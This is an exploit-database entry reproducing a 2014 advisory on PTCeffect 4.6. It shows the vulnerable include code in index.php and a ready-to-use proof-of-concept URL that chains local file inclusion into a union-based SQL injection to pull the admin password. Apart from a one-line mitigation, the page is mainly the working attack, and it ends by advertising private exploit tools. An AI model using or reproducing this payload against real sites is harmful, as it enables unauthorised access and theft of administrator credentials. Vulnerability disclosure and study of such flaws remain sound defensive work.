header-logo
Suggest Exploit
vendor:
PTCeffect
by:
Walidz
6,5
CVSS
MEDIUM
LFI & SQL Injection
89
CWE
Product Name: PTCeffect
Affected Version From: 4.6
Affected Version To: 4.6
Patch Exists: NO
Related CWE: N/A
CPE: a:ptceffect:ptceffect:4.6
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac OS
2014

PTCeffect LFI & SQL Injection Vulnerabilities

The LFI vulnerability is in index.php, so you can include a file by doing http://[site]/index.php?view=[file]. By using the LFI, you can also include 'admin files' which are especially unsecure, and let you inject SQL queries. As the file admin/sources/edit_loginad.php, a PoC can be done by http://[site]/index.php?view=../admin/Sources/edit_loginad&edit=-1%20union%20select%201,2,3,4,%28SELECT%20password%20FROM%20admin%29,6,7,8,9--%20-

Mitigation:

Ensure that user input is properly sanitized and validated before being used in a file or directory path.
Source

Exploit-DB raw data:

# Exploit Title: PTCeffect LFI & SQL Injection Vulnerabilities 
# Google Dork: find it :)
# Date: 2014-04-19
# Exploit Author: Walidz
# Software Link: http://www.ptceffect.com/ 
# Version: 4.6
# Tested on: windows,linux,mac os
# CVE : N/A

The LFI vulnerability is in index.php
 
--------------------[index.php]--------------------
 
if ($input->g['view']) {
        $filename = strtolower($input->g['view']) . ".php";
 
[...]
 
 
include SOURCES . $filename;
 
 
--------------------[index.php]--------------------
 
So you can include a fil by doing ; http://[site]/index.php?view=[file]
 
 
By using the LFI, you can also include "admin files" which are especially unsecure, and let you inject SQL queries.
 
As the file admin/sources/edit_loginad.php
 
 
PoC ; http://[site]/index.php?view=../admin/Sources/edit_loginad&edit=-1%20union%20select%201,2,3,4,%28SELECT%20password%20FROM%20admin%29,6,7,8,9--%20-
 
 
For more tools and priv8 exploit: http://security-dz.com
For contact: admin@security-dz.com